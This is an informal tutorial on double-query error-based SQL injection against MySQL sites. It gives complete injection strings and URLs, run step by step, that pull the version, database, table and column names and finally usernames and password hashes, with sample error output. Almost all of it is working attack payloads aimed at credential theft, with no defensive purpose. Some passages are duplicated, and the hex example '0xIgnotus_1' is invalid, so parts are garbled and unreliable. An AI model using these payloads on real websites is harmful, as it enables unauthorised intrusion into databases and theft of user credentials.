Double
Query
Works exactly the same as error based injection but, the Error Based Query will
be doubled as a single query statement.
So that we again successfully get an error message.
Determine when we should use error or double query Injection.
you switch over to union select statements the page then returns an error saying something like:
Case 1:
The Used Select Statements Have Different Number Of Columns.
Case 2:
Unknown column 1;
Case 3:
Nothing returns at all. And you can't find the columns on the web content.
Then you can also use error based Injection.
Short
explanation:
Now I haven’t been explaining this so well, i will take my time to make this
clear to you.
This method is almost exact the same as error based but it uses 2 query's in
one syntax.
This way it makes the database respond whit the things we ask.
You can see this as overloading someone whit so many information he has no
other choice then to give the answer.
Get the MySQL Version
Before you start you're way up to the end of this tutorial. Take a look at the
Query below and one of error based injection.
There is a lot of difference in the query's don't mess em up.
Our Query for the version! (Double Query):
+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In
URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,cast(version()+as+char),0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Now what does this extremely large query tell us?
We yet again select multiple statements using the concat method and whit double query cast the version as characters .
We want this from information.schema (database) and we add and 1=1 at the end of our query to make it return true.
Error message:
We yet again select multiple statements using the concat method and whit double query cast the version as characters .
We want this from information.schema (database) and we add and 1=1 at the end of our query to make it return true.
Error message:
Duplicate
entry '5.1.65-cll' for key 1
It is a must to keep your query's clean there for yet again i advice the hackbar. Because one thing wrong results in an error without information.
We don't want that to happen do we . Let us get the database name.
Get the Database Name
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In
URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
As
you have seen in error based the limit here is important. If you want to get
all database names.
I won't be explaining everything as i usually do ill ad up what is new. This really reduces my writing time.
Here we select scheme_name (database) as characters. Whit the first LIMIT only the first increasing you get all database names.
I won't be explaining everything as i usually do ill ad up what is new. This really reduces my writing time.
Here we select scheme_name (database) as characters. Whit the first LIMIT only the first increasing you get all database names.
Error code:
Duplicate
entry 'Ignotus_1' for key 1Our database is Ignotus_1.
Now its important to
write down the database name.
Get the Table Names
!!Where it said 0x Ignotus_1 we need to ad the database name in HEX. The 0x in front is IMPORTANT!!
Our Query to extract our table names:
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+Where+table_schema=0xIgnotus_1+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In URL:
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(table_name+as+char),0x27,0x7e)+FROM+information_schema.tables+Where+table_schema=0xIgnotus_1+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
As we have learned for a few times now the limit will get us all tables. Keep increasing the first limit in the query until you have all tables. (The one behind our database name in HEX).
Short explanation of what’s new in our query:
We again want the table names as characters shown in our error output.
Our database to select the table names from with a limit to get all tables.
Now you should have a list of table names and look for a useful one.
Mine is USERS. Same as with error based we now want the column names of that table.
Error code:
Duplicate
entry 'USERS' for key 1
Get the Column Names.
And where it said 0xUSERS put your table name you are going to use don't forget the 0x has to be there in order for MySQL to translate it. !!
Another mind blowing query for extracting the columns:
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+Where+table_schema=0xIgnotus_1+AND+table_name=0xUSERS+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In
URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(column_name+as+char),0x27,0x7e)+FROM+information_schema.columns+Where+table_schema=0xIgnotus_1+AND+table_name=0xUSERS+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Yet again here is a limit the first one behind our database name in HEX, if we increase that limit we will get all columns.
Short explanation of our new vector:
We want the column names from our database which is in hex and we want to select those column names from the table we chose and put in hex.
Error code:
Duplicate
entry 'Usernames' for key 1
Second error using a limit:
Duplicate
entry 'Passwords' for key 1
Now we want to extract all the info we can get from these columns. Username and Password.
Extracting Information from the Columns
Finally, Finally and Finally we are getting to an end i am getting bored
writing anyway!
This is the part where we all know we get what we want!
!!First of all there needs a little bit changing done in our query again!
Where it said USERS.Username is where you put your table name and next your column name.
Yes This time we need 2 Query's in order to get Username and password. And Where it said Ignotus_1 we put our database name. (not in hex this time).!!
This is the part where we all know we get what we want!
!!First of all there needs a little bit changing done in our query again!
Where it said USERS.Username is where you put your table name and next your column name.
Yes This time we need 2 Query's in order to get Username and password. And Where it said Ignotus_1 we put our database name. (not in hex this time).!!
This is our query to extract all data from our columns:
+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat(0x7e,0x27,cast(USERS.Username+as+char),0x27,0x7e)+FROM+`database_name`.table_name+LIMIT+N,1) )+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
In
URL:
http://www.[site].com/page.php?id=1+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat(0x7e,0x27,cast(USERS.Username+as+char),0x27,0x7e)+FROM+`database_name`.table_name+LIMIT+N,1) )+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Error message:
Duplicate
entry 'uSploit' for key 1
Now for our passwords we only need to edit Username into passwords and execute.
This wil result in an error providing us the password.
Error message:
Duplicate
entry '4c0e8eb3ed67f58dc56e724e5297a598n' for key 1
Username: uSploit
Password: 4c0e8eb3ed67f58dc56e724e5297a598n
